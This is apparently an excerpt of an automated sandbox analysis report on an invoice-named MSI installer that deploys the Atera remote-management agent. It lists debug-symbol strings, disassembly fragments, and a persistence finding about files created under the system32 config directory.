                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System.pdb source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdbSHA256`{f source: AgentPackageMonitoring.exe, 00000023.00000002.2089230351.000001F71D202000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000015.00000002.1983854282.0000015E7D2E2000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: PC:\Windows\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2012\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2939724800.00007FFDF08CC000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/netstandard2.0-Release/Microsoft.Extensions.Configuration.Abstractions.pdb source: Microsoft.Extensions.Configuration.Abstractions.dll0.26.dr
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2128484698.000001F735F12000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.pdb8 source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration/netstandard2.0-Release/Microsoft.Extensions.Configuration.pdbSHA256o source: Microsoft.Extensions.Configuration.dll0.26.dr
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdbSHA256 source: AgentPackageMonitoring.exe, 00000023.00000002.2121847916.000001F735C42000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.DiagnosticSource/net45-Release/System.Diagnostics.DiagnosticSource.pdb source: AgentPackageSystemTools.exe, 00000039.00000002.2536132761.0000025FBFA42000.00000002.00000001.01000000.0000003E.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb8 source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1961278345.000002156B882000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000C.00000000.1718405720.000001779DAC2000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: rundll32.exe, 00000037.00000002.2574650690.00000000072C4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/Release/net8.0/System.ServiceProcess.ServiceController.pdb source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: n\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000037.00000002.2569972227.0000000000857000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdbp+ source: AgentPackageMonitoring.exe, 00000023.00000002.2128484698.000001F735F12000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: System.Threading.Tasks.dll.26.dr
                                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netstandard1.1\System.Buffers.pdbSHA256 source: System.Buffers.dll.26.dr
                                Source: Binary string: dows\dll\mscorlib.pdbp source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Deserialize39d51241-3394-4768-bd65-23be6a91f1ddonitoring.pdbpdbing.pdb source: AgentPackageMonitoring.exe, 0000003C.00000002.2790839667.0000029E3B5E9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb8 source: AgentPackageProgramManagement.exe, 00000031.00000002.2972609455.00000153FD172000.00000002.00000001.01000000.00000049.sdmp
                                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\21\obj\Microsoft.ApplicationInsights\Release\src\Microsoft.ApplicationInsights\net45\Microsoft.ApplicationInsights.pdb source: AgentPackageSystemTools.exe, 00000039.00000002.2542820315.0000025FD8322000.00000002.00000001.01000000.00000040.sdmp
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000C.00000000.1718405720.000001779DAC2000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageADRemote\AgentPackageADRemote\obj\Release\AgentPackageADRemote.pdb source: AteraAgent.exe, 0000001A.00000002.2905094619.00000216492D7000.00000004.00000020.00020000.00000000.sdmp, AgentPackageADRemote.exe.26.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdbSHA256 source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageInternalPoller\AgentPackageInternalPoller\obj\Release\AgentPackageInternalPoller.pdb source: AgentPackageInternalPoller.exe, 0000002F.00000000.2379668284.0000022B81DC2000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000D.00000002.2387388686.0000021C5B7C2000.00000002.00000001.01000000.0000002C.sdmp
                                Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb& source: rundll32.exe, 00000037.00000002.2574650690.00000000072C4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileProviders.Abstractions/Release/net8.0/Microsoft.Extensions.FileProviders.Abstractions.pdb source: Microsoft.Extensions.FileProviders.Abstractions.dll0.26.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2125952751.000001F735E52000.00000002.00000001.01000000.00000025.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\code\dapper-dot-net\Dapper\bin\Release\net45\Dapper.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2122915636.000001F735CD2000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net6.0-Release/System.Diagnostics.EventLog.pdb source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\System.pdbB5L source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netstandard1.1\System.Buffers.pdb source: System.Buffers.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdbb source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: System.Dynamic.Runtime.dll.26.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1984126068.000002156C344000.00000002.00000001.01000000.00000019.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, Newtonsoft.Json.dll1.13.dr
                                Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp
                                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdbSHA256~ source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1984126068.000002156C344000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2125952751.000001F735E52000.00000002.00000001.01000000.00000025.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll1.13.dr
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration/netstandard2.0-Release/Microsoft.Extensions.Configuration.pdb source: Microsoft.Extensions.Configuration.dll0.26.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdb source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: lib.pdb source: AgentPackageSTRemote.exe, 00000021.00000002.2691314024.000002EF74DD8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2784658706.000002203A692000.00000002.00000001.01000000.00000044.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdb source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: C:\Windows\System.pdbpdbtem.pdb! source: rundll32.exe, 00000037.00000002.2574650690.0000000007290000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdb source: AgentPackageInternalPoller.exe, 0000002F.00000002.2469228610.0000022B9B262000.00000002.00000001.01000000.0000003B.sdmp
                                Source: Binary string: ent.pdb0Pff source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: ?+nC:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000037.00000002.2569972227.0000000000857000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdbv source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/netstandard2.0-Release/Microsoft.Extensions.Configuration.Abstractions.pdbSHA256^r? source: Microsoft.Extensions.Configuration.Abstractions.dll0.26.dr
                                Source: Binary string: System.pdb source: rundll32.exe, 00000037.00000002.2574650690.00000000072C4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pC:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\System.pdb source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dll.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2861314309.0000022052F3B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.pdbSHA256j source: CliWrap.dll.26.dr
                                Source: Binary string: C:\Windows\AgentPackageUpgradeAgent.pdbpdbent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1762341854.00000177B8112000.00000002.00000001.01000000.00000011.sdmp, Pubnub.dll0.1.dr
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1762341854.00000177B8112000.00000002.00000001.01000000.00000011.sdmp, Pubnub.dll0.1.dr
                                Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdble source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdbdditio source: rundll32.exe, 00000037.00000002.2574650690.00000000072C4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdb source: AgentPackageInternalPoller.exe, 0000002F.00000002.2462648805.0000022B9AFD2000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 0000002C.00000000.2361394254.00000214714D2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileProviders.Abstractions/Release/net8.0/Microsoft.Extensions.FileProviders.Abstractions.pdbSHA256 source: Microsoft.Extensions.FileProviders.Abstractions.dll0.26.dr
                                Source: BouncyCastle.Crypto.dll.1.drStatic PE information: 0xE49A52B3 [Sun Jul 15 06:22:43 2091 UTC]
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F1910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,35_2_00007FFDEE3F1910
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_07074ECF push dword ptr [esp+ecx*2-75h]; ret 4_3_07074ED3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B37D45B push cs; retf 12_2_00007FFD9B37D465
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B460853 push eax; retf B82Ch12_2_00007FFD9B460979
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B597450 push ds; ret 13_2_00007FFD9B59795F
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B594DD4 push eax; ret 13_2_00007FFD9B594E04
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_071B4ECF push dword ptr [esp+ecx*2-75h]; ret 16_3_071B4ED3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B37D555 push cs; retf 20_2_00007FFD9B37D83F
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B3700BD pushad ; iretd 20_2_00007FFD9B3700C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3A7AFE push ss; ret 21_2_00007FFD9B3A7C17
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3A7A1D push ss; ret 21_2_00007FFD9B3A7C17
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B39D555 push cs; retf 21_2_00007FFD9B39D83F
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3900BD pushad ; iretd 21_2_00007FFD9B3900C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B39D7B0 push cs; retf 21_2_00007FFD9B39D83F
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 24_2_00007FFD9B3600BD pushad ; iretd 24_2_00007FFD9B3600C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B37D2D3 push FFFFFFE8h; ret 26_2_00007FFD9B37D2F9
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B37CF38 push FFFFFFE8h; ret 26_2_00007FFD9B37D2F9
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B37A64A push eax; retf 26_2_00007FFD9B37A661
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B37A650 push eax; retf 26_2_00007FFD9B37A661
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3825F2 push eax; iretd 26_2_00007FFD9B382631
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B382DFA push FFFFFFE8h; retf 26_2_00007FFD9B382EF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B5961BF push esp; ret 26_2_00007FFD9B5962C9
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B580F38 push eax; ret 26_2_00007FFD9B580F94
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3BD438 push eax; retn 9B4Ch29_2_00007FFD9B3BD939
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3B7967 push ebx; retf 29_2_00007FFD9B3B796A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3B8163 push ebx; ret 29_2_00007FFD9B3B816A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3A00BD pushad ; iretd 29_2_00007FFD9B3A00C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B387C18 push eax; retf 5F4Dh33_2_00007FFD9B387D6D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B38D699 push es; retf 33_2_00007FFD9B38D847
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B377C2E pushad ; retf 33_2_00007FFD9B377C5D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B38C2BE pushad ; iretd 33_2_00007FFD9B38C2BF
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B3700BD pushad ; iretd 33_2_00007FFD9B3700C1

                                Persistence and Installation Behavior

                                barindex
                                Creates files in the system32 config directory
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
